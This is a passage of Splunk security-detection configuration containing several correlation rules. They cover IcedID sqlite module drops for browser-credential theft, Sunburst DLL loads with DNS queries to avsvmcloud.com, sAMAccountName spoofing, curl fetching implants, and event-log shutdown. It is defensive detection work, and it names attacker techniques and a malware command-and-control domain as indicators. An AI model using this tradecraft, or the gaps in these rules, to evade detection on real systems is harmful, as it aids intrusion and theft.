action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Sqlite Module In Temp Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious file creation of sqlite3.dll in %temp% folder. This behavior was seen in IcedID malware where it download sqlite module to parse browser database like for chrome or firefox to stole browser information related to bank, credit card or credentials. action.notable.param.rule_title = Sqlite Module In Temp Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=11 (TargetFilename = "*\\sqlite32.dll" OR TargetFilename = "*\\sqlite64.dll") (TargetFilename = "*\\temp\\*") | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id process_name file_name file_path action process_guid| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sqlite_module_in_temp_folder_filter` [ESCU - Steal or Forge Authentication Certificates Behavior Identified - Rule] action.escu = 0 action.escu.enabled = 1 description = This correlation rule focuses on detecting potential threats associated with MITRE ATT&CK T1649 (Steal or Forge Authentication Certificates). The rule is designed to identify instances where 5 or more analytics related to Windows Certificate Services analytic story that are triggered within a specified time frame, which may indicate a potential attack in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = This correlation rule focuses on detecting potential threats associated with MITRE ATT&CK T1649 (Steal or Forge Authentication Certificates). The rule is designed to identify instances where 5 or more analytics related to Windows Certificate Services analytic story that are triggered within a specified time frame, which may indicate a potential attack in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information. action.escu.how_to_implement = The Windows Certificate Services analytic story must have 5 or more analytics enabled. In addition, ensure data is being logged that is required. Modify the correlation as needed based on volume of noise related to the other analytics. action.escu.known_false_positives = False positives may be present based on automated tooling or system administrators. Filter as needed. action.escu.creation_date = 2023-05-01 action.escu.modification_date = 2023-05-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Steal or Forge Authentication Certificates Behavior Identified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Windows Certificate Services"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Steal or Forge Authentication Certificates Behavior Identified - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This correlation rule focuses on detecting potential threats associated with MITRE ATT&CK T1649 (Steal or Forge Authentication Certificates). The rule is designed to identify instances where 5 or more analytics related to Windows Certificate Services analytic story that are triggered within a specified time frame, which may indicate a potential attack in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information. action.notable.param.rule_title = RBA: Steal or Forge Authentication Certificates Behavior Identified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Windows Certificate Services" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 5 | `steal_or_forge_authentication_certificates_behavior_identified_filter` [ESCU - Sunburst Correlation DLL and Network Event - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The malware sunburst will load the malicious dll by SolarWinds.BusinessLayerHost.exe. After a period of 12-14 days, the malware will attempt to resolve a subdomain of avsvmcloud.com. This detections will correlate both events. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1203"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The malware sunburst will load the malicious dll by SolarWinds.BusinessLayerHost.exe. After a period of 12-14 days, the malware will attempt to resolve a subdomain of avsvmcloud.com. This detections will correlate both events. action.escu.how_to_implement = This detection relies on sysmon logs with the Event ID 7, Driver loaded. Please tune your sysmon config that you DriverLoad event for SolarWinds.Orion.Core.BusinessLayer.dll is captured by Sysmon. Additionally, you need sysmon logs for Event ID 22, DNS Query. We suggest to run this detection at least once a day over the last 14 days. action.escu.known_false_positives = unknown action.escu.creation_date = 2020-12-14 action.escu.modification_date = 2020-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Sunburst Correlation DLL and Network Event - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Sunburst Correlation DLL and Network Event - Rule action.correlationsearch.annotations = {"analytic_story": ["NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1203"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The malware sunburst will load the malicious dll by SolarWinds.BusinessLayerHost.exe. After a period of 12-14 days, the malware will attempt to resolve a subdomain of avsvmcloud.com. This detections will correlate both events. action.notable.param.rule_title = Sunburst Correlation DLL and Network Event action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = (`sysmon` EventCode=7 ImageLoaded=*SolarWinds.Orion.Core.BusinessLayer.dll) OR (`sysmon` EventCode=22 QueryName=*avsvmcloud.com) | eventstats dc(EventCode) AS dc_events | where dc_events=2 | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) AS ImageLoaded values(QueryName) AS QueryName by host | rename host as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `sunburst_correlation_dll_and_network_event_filter` [ESCU - Suspicious Computer Account Name Change - Rule] action.escu = 0 action.escu.enabled = 1 description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries need to create a new computer account name and rename it to match the name of a domain controller account without the ending '$'. In Windows Active Directory environments, computer account names always end with `$`. This analytic leverages Event Id 4781, `The name of an account was changed`, to identify a computer account rename event with a suspicious name that does not terminate with `$`. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries need to create a new computer account name and rename it to match the name of a domain controller account without the ending '$'. In Windows Active Directory environments, computer account names always end with `$`. This analytic leverages Event Id 4781, `The name of an account was changed`, to identify a computer account rename event with a suspicious name that does not terminate with `$`. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows event logs from your hosts. In addition, the Splunk Windows TA is needed. action.escu.known_false_positives = Renaming a computer account name to a name that not end with '$' is highly unsual and may not have any legitimate scenarios. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Computer Account Name Change - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = A computer account $Old_Account_Name$ was renamed with a suspicious computer name action.risk.param._risk = [{"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Computer Account Name Change - Rule action.correlationsearch.annotations = {"analytic_story": ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-42287", "CVE-2021-42278"], "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries need to create a new computer account name and rename it to match the name of a domain controller account without the ending '$'. In Windows Active Directory environments, computer account names always end with `$`. This analytic leverages Event Id 4781, `The name of an account was changed`, to identify a computer account rename event with a suspicious name that does not terminate with `$`. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.notable.param.rule_title = Suspicious Computer Account Name Change action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4781 Old_Account_Name="*$" New_Account_Name!="*$" | table _time, ComputerName, Account_Name, Old_Account_Name, New_Account_Name | `suspicious_computer_account_name_change_filter` [ESCU - Suspicious Copy on System32 - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003", "T1036"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = every user may do this event but very un-ussual. action.escu.creation_date = 2023-08-17 action.escu.modification_date = 2023-08-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Copy on System32 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Qakbot", "IcedID", "AsyncRAT", "Sandworm Tools", "Volt Typhoon"] action.risk = 1 action.risk.param._risk_message = Execution of copy exe to copy file from $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Copy on System32 - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Qakbot", "IcedID", "AsyncRAT", "Sandworm Tools", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003", "T1036"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network. action.notable.param.rule_title = Suspicious Copy on System32 action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN("cmd.exe", "powershell*","pwsh.exe", "sqlps.exe", "sqltoolsps.exe", "powershell_ise.exe") AND `process_copy` AND Processes.process IN("*\\Windows\\System32\\*", "*\\Windows\\SysWow64\\*") AND Processes.process = "*copy*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id temp | `drop_dm_object_name(Processes)` | eval splitted_commandline=split(process," ") | eval first_cmdline=lower(mvindex(splitted_commandline,0)) | where NOT LIKE(first_cmdline,"%\\windows\\system32\\%") AND NOT LIKE(first_cmdline,"%\\windows\\syswow64\\%") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`suspicious_copy_on_system32_filter` [ESCU - Suspicious Curl Network Connection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. Filter as needed. action.escu.creation_date = 2021-02-22 action.escu.modification_date = 2021-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Curl Network Connection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Silver Sparrow", "Ingress Tool Transfer", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious Curl Network Connection - Rule action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow", "Ingress Tool Transfer", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software. action.notable.param.rule_title = Suspicious Curl Network Connection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process=s3.amazonaws.com by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_curl_network_connection_filter` [ESCU - Suspicious DLLHost no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious DLLHost no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Suspicious dllhost.exe process with no command line arguments executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious DLLHost no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Suspicious DLLHost no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_dllhost` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(dllhost\.exe.{0,4}$)" | `suspicious_dllhost_no_command_line_arguments_filter` [ESCU - Suspicious Driver Loaded Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will detect suspicious driver loaded paths. This technique is commonly used by malicious software like coin miners (xmrig) to register its malicious driver from notable directories where executable or drivers do not commonly exist. During triage, validate this driver is for legitimate business use. Review the metadata and certificate information. Unsigned drivers from non-standard paths is not normal, but occurs. In addition, review driver loads into `ntoskrnl.exe` for possible other drivers of interest. Long tail analyze drivers by path (outside of default, and in default) for further review. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.003", "T1543"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic will detect suspicious driver loaded paths. This technique is commonly used by malicious software like coin miners (xmrig) to register its malicious driver from notable directories where executable or drivers do not commonly exist. During triage, validate this driver is for legitimate business use. Review the metadata and certificate information. Unsigned drivers from non-standard paths is not normal, but occurs. In addition, review driver loads into `ntoskrnl.exe` for possible other drivers of interest. Long tail analyze drivers by path (outside of default, and in default) for further review. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the driver loaded and Signature from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Limited false positives will be present. Some applications do load drivers action.escu.creation_date = 2021-04-29 action.escu.modification_date = 2021-04-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Driver Loaded Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["XMRig", "CISA AA22-320A", "AgentTesla", "BlackByte Ransomware", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = Suspicious driver $file_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Driver Loaded Path - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "CISA AA22-320A", "AgentTesla", "BlackByte Ransomware", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.003", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will detect suspicious driver loaded paths. This technique is commonly used by malicious software like coin miners (xmrig) to register its malicious driver from notable directories where executable or drivers do not commonly exist. During triage, validate this driver is for legitimate business use. Review the metadata and certificate information. Unsigned drivers from non-standard paths is not normal, but occurs. In addition, review driver loads into `ntoskrnl.exe` for possible other drivers of interest. Long tail analyze drivers by path (outside of default, and in default) for further review. action.notable.param.rule_title = Suspicious Driver Loaded Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=6 ImageLoaded = "*.sys" NOT (ImageLoaded IN("*\\WINDOWS\\inf","*\\WINDOWS\\System32\\drivers\\*", "*\\WINDOWS\\System32\\DriverStore\\FileRepository\\*")) | stats min(_time) as firstTime max(_time) as lastTime count by dest ImageLoaded Hashes IMPHASH Signature Signed| rename ImageLoaded as file_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_driver_loaded_path_filter` [ESCU - Suspicious Event Log Service Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes Windows Event ID 1100 to identify when Windows event log service is shutdown. Note that this is a voluminous analytic that will require tuning or restricted to specific endpoints based on criticality. This event generates every time Windows Event Log service has shut down. It also generates during normal system shutdown. During triage, based on time of day and user, determine if this was planned. If not planned, follow through with reviewing parallel alerts and other data sources to determine what else may have occurred. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes Windows Event ID 1100 to identify when Windows event log service is shutdown. Note that this is a voluminous analytic that will require tuning or restricted to specific endpoints based on criticality. This event generates every time Windows Event Log service has shut down. It also generates during normal system shutdown. During triage, based on time of day and user, determine if this was planned. If not planned, follow through with reviewing parallel alerts and other data sources to determine what else may have occurred. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows event logs from your hosts. In addition, the Splunk Windows TA is needed. action.escu.known_false_positives = It is possible the Event Logging service gets shut down due to system errors or legitimately administration tasks. Filter as needed. action.escu.creation_date = 2021-06-17 action.escu.modification_date = 2021-06-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Event Log Service Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Windows Log Manipulation", "Ransomware", "Clop Ransomware"] action.risk = 1 action.risk.param._risk_message = The Windows Event Log Service shutdown on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Event Log Service Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "Ransomware", "Clop Ransomware"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes Windows Event ID 1100 to identify when Windows event log service is shutdown. Note that this is a voluminous analytic that will require tuning or restricted to specific endpoints based on criticality. This event generates every time Windows Event Log service has shut down. It also generates during normal system shutdown. During triage, based on time of day and user, determine if this was planned. If not planned, follow through with reviewing parallel alerts and other data sources to determine what else may have occurred. action.notable.param.rule_title = Suspicious Event Log Service Behavior action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = (`wineventlog_security` EventCode=1100) | stats count min(_time) as firstTime max(_time) as lastTime by dest Message EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | 